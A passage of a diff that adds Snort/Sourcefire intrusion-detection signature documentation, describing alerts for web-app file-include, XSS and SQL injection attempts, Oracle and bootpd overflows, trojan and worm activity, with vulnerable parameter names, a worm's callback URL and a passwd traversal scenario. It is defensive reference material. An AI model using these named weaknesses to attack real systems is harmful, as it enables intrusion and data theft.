+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000563.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000563
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "GL-SH Deaf Forum" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "page" parameter in the "show.php" script used 
+by the "GL-SH Deaf Forum" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using GL-SH Deaf Forum
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000641.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000641
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "template_modify.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"template_modify.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1984.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+1984
+
+--
+Summary:
+Deepthroat is a Trojan Horse offering the attacker control of the target.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a compromise of all resources the machine is connected to. This Trojan also has the ability to delete data, steal passwords and disable the machine.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+
+The Trojan changes system registry settings to add the Deepthroat sever to programs normally started on boot.
+
+See also rules with sids 195, 1980, 1981, 1982 and 1983.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This event is indicative of an existing infection being activated. Initial compromise can be in the form of a Win32 installation program that may use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. Updated virus definition files are essential in detecting this Trojan. Once compromised, this Trojan grants the attacker the ability to almost completely control the target.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+Registry keys added are:
+
+	Systemtray
+
+Removal of the files pddt.dat and systray.exe from the Windows system directory is required.
+
+Ending the process systray.exe is also necessary. A reboot of the infected machine is recommended.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS106
+
+Symantec Security Response
+http://securityresponse.symantec.com/avcenter/venc/data/deepthroat.trojan.html
+
+--
--- /dev/null
+++ b/doc/signatures/100000351.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000351
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "UBBThreads" application running on a webserver. Access to the file "config[cookieprefix]" using a remote file being passed as the "w3t_language" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "w3t_language" parameter in the "config[cookieprefix]" script used by the "UBBThreads" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using UBBThreads
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000775.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000775
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Blog CMS" application running on a webserver. Access to the file "index.php" with SQL commands being passed as the "PHPSESSID" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "PHPSESSID" parameter in the "index.php" script used by the "Blog CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Blog CMS
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000226.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+100000226
+
+--
+Summary:
+This event is generated when a host connected to the Internet is first infected 
+with the BlackWorm/Nyxem virus.
+
+--
+Impact:
+The system generating the alert has likely been infected with the 
+BlackWorm/Nyxem virus.
+
+--
+Detailed Information:
+When a system is first infected with the BlackWorm/Nyxem virus, the malicious 
+program attempts to access 
+http://207.172.16.155/cgi-bin/Count.cgi?df=76547 in order to report a 
+successful installation. Numerous sources, including the Sourcefire VRT, have 
+confirmed that this URL is static.
+
+--
+Affected Systems:
+All Windows systems.
+
+--
+Attack Scenarios:
+The virus may arrive by e-mail, in which case a user must execute the file in 
+order to be infected. Once infected, hosts conduct NetBIOS scans and attempt to 
+infect other hosts via publicly accessible shares; in this method, no user 
+interaction is required.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+Any user who directs a web browser to 
+http://207.172.16.155/cgi-bin/Count.cgi?df=76547 will trigger this rule.
+
+--
+False Negatives:
+Hosts without Internet access which become infected (i.e. by another infected 
+system on their local network) will not trigger this rule until they connect to 
+the Internet, as they will be unable toaccess this web page.
+
+--
+Corrective Action:
+Several antivirus vendors have detection and removal capabilities. 
+Additionally, Microsoft has detailed instructions for manual removal on their 
+web site.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matthew Watchinski <mwatchinski@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000124.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+100000124
+
+--
+Summary:
+This event is generated when inappropriate content is detected in network 
+traffic.
+
+--
+Impact:
+Possible policy violation.
+
+--
+Detailed Information:
+This event is generated when inappropriate content is detected in network 
+traffic. Specifically, the content "girls gone wild" was observed.
+
+--
+Affected Systems:
+ All systems.
+
+--
+Attack Scenarios:
+This event indicates that inappropriate content may have been accessed from a 
+host on the protected network.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+This may be a policy violation, refer to the appropriate internal policy.
+
+--
+Contributors:
+Original Rule writer rmkml <rmkml@free.fr>
+Sourcefire Vulnerability Research Team
+Alex Kirk <akirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/419.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+
+Sid:
+419
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP Mobile Host Redirect datagram.
+
+--
+
+Impact:
+ICMP Mobile Host Redirect Messages alert base-stations to the movements of IP based mobile hosts, such as notebooks and palmtop computers.
+
+--
+
+Detailed Information:
+The Transparent Internet Routing for IP Mobile Hosts IETF draft defines ICMP Type 32 Code 0 as an ICMP Mobile Host Redirect Message.  This message was intended to be used by mobile computers to inform base-stations of their location on the network as they move from base-station to base-station.  
+
+This IETF draft was never ratified, and no hardware is known to exist that generates this type of ICMP datagram
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+ICMP Type 32 datagrams are not normal network activity.  Hosts generating these types of datagrams should be investigated for nefarious activity
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/2798.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2798
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure register_statistics
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2829.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2829
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure comment_on_repobject
+. This procedure is included in
+sys.dbms_repcat_mas.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2223.txt
@@ -0,0 +1,54 @@
+Rule:  
+
+--
+Sid:
+2223
+
+--
+Summary:
+This event is generated when an attempt is made to access csNews.cgi on an internal web server. This may indicate an attempt to exploit a file disclosure vulnerability in csNews.cgi, a script distributed by CGIScript.NET.
+
+--
+Impact:
+Information disclosure. The attacker must have an authenticated account to successfully execute this exploit.
+
+--
+Detailed Information:
+csNews.cgi is a Perl script that manages web-based news items, and contains a vulnerability in its ability to decode and filter out double-decoded URL data on the Advanced Settings page. An authenticated attacker can insert double-decoded directory traversals and file names into the header or footer parameters in csNews.cgi, and the files will appear in the header or footer of the page. 
+
+--
+Affected Systems:
+Systems running CGISCRIPT.NET csNews 1.0 or CGISCRIPT.NET csNews Professional 1.0
+
+--
+Attack Scenarios:
+An attacker crafts a URL with /../../passwd double-encoded in the header or footer parameter. If the password file exists in that location, the file will appear in the header or footer of the web page.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+If a legitimate remote user accesses csNews.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+It is not known if this vulnerability has been patched or fixed in later versions. Contact the vendor for more information.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1939.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+1939
+
+--
+Summary:
+This event is generated when a possible buffer overflow is attempted for the bootpd service.
+
+--
+Impact:
+Remote access. This attack may permit the execution of arbitrary commands on the vulnerable server.
+
+--
+Detailed Information:
+Bootp is a protocol used for devices such as diskless workstations to locate a host from which to boot and to receive an assigned an IP address.  A flaw exists in the bootpd service allowing a possible buffer overflow condition when a bootp request is issued with an invalid hardware address type. This attack may permit the execution of arbitrary commands on the vulnerable server. 
+
+--
+Affected Systems:
+OpenBSD 2.3, 2.4
+FreeBSD - Releases up to and including 2.x
+
+--
+Attack Scenarios:
+An attacker may attempt to use this exploit to gain remote access on the vulnerable server.
+
+--
+Ease of Attack:
+Simple. Exploit code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Block bootp traffic from entering your network.  
+
+--
+Contributors:
+Original rule writer unknown.
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0798
+
+--
--- /dev/null
+++ b/doc/signatures/645.txt
@@ -0,0 +1,62 @@
+Rule: 
+
+--
+Sid: 645
+
+--
+Summary: 
+This event is generated when a buffer overflow attack is attempted against a target machine.
+
+--
+Impact: 
+Serious. The attacker may be able to gain remote access to the system or have the ability to execute arbitrary code with the privileges of a system user.
+
+
+-- 
+Detailed Information: 
+This rule tracks the bit combination which may occur in network packets aimed at overflowing Sparc Solaris/SunOS network services. The buffer overflow attack attempts to force the vulnerable application to execute  attacker-controlled code in order to gain interactive access or run arbitrary commands on the vulnerable system.
+
+A specific string used during the overflow is application-dependent however, a platform-specific command or code may be present and is detected by this rule.
+
+--
+Attack Scenarios: 
+An attacker launches an overflow exploit against a vulnerable FTP server and gains the ability to start a shell session, thus obtaining interactive access to the target.
+
+--
+Ease of Attack: 
+Simple
+
+
+--
+False Positives: 
+This event may be generated by legitimate traffic to the specified port.
+
+
+-- 
+False Negatives: 
+This event is specific to the shell code defined in the rule.
+Other shell code sequences may not be detected.
+
+--
+Corrective Action: 
+Check the target host for other signs of compromise.
+
+Look for other events concerning the target host.
+
+Apply vendor supplied patches and keep the operating system up to date.
+
+--
+Contributors: 
+Original Rule Writer Unkown
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS353
+
+--
--- /dev/null
+++ b/doc/signatures/2274.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2274
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to an
+POP3 server using brute force methods.
+
+--
+Impact:
+Attempted remote access.  
+This event may indicate that an attacker is attempting to guess username and password combinations.  
+Alternately, it may indicate that an authorized user has entered an
+incorrect username and password combination a number of times.
+
+--
+Detailed Information:
+An POP3 server will issue an error message after a failed login attempt.  
+This may be an indication of an attacker attempting brute force guessing 
+of username and password combinations.  It is also possible that an authorized 
+user has incorrectly entered a legitimate username and password combination.  
+
+This event will be generated after a number of failed attempts.
+
+--
+Affected Systems:
+POP3 servers.
+
+--
+Attack Scenarios:
+An attacker may attempt to guess username and password combinations.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+This event may be triggered by a failed POP3 login attempt from a remote user.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2875.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2875
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_priority
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000347.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000347
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ezupload Pro" application running on a webserver. Access to the file "form.php" using a remote file being passed as the "path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "path" parameter in the "form.php" script used by the "Ezupload Pro" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ezupload Pro
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/558.txt
@@ -0,0 +1,90 @@
+Rule:  
+
+--
+
+Sid:
+
+558
+
+--
+
+Summary:
+
+A network-external server has authenticated an internal GNUTella client
+connection attempt and they have begun communications.
+
+--
+
+Impact:
+
+Possible policy violation.
+
+--
+
+Detailed Information:
+
+GNUTella is a P2P (Peer-to-Peer) protocol for exchanging arbitrary
+files.  Depending on your site's policies, using it may be a policy
+violation.
+
+If not properly configured, GNUTella clients may accidentally share out
+confidential files.  GNUTella worms (which use deceptive names to
+encourage download) and viruses may also be accidentally downloaded by a
+client.
+
+This rule being triggered means that a GNUTella client has been detected
+on the protected network.
+
+--
+
+Affected Systems:
+
+Any system with a GNUTella client installed (available for most
+platforms)
+
+--
+
+Attack Scenarios:
+
+N/A
+
+--
+
+Ease of Attack:
+
+N/A
+
+--
+
+False Positives:
+
+This rule detects the term "GNUTELLA OK" on all ports.  As a result, any
+email, web page, or other network content that discusses the protocol
+and its messages will trigger this alert.
+
+--
+
+False Negatives:
+
+None known.
+
+--
+
+Corrective Action:
+
+Depends on acceptable use policies.
+
+--
+
+Contributors:
+Original Rule Writer Unknown
+Snort documentation contributed by Gene R Gomez (gene!AT!gomezbrothers!DOT!com)
+
+-- 
+
+Additional References:
+
+GNUTella
+http://www.gnutella.com
+
+--
--- /dev/null
+++ b/doc/signatures/100000345.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000345
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "SocketMail" application running on a webserver. Access to the file "inc-common.php" using a remote file being passed as the "site_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "site_path" parameter in the "inc-common.php" script used by the "SocketMail" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using SocketMail
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000614.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000614
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "link_premium_listing.php" using a remote file being passed 
+as the "admin_template_path" parameter may indicate that an exploitation 
+attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"link_premium_listing.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/924.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+924
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
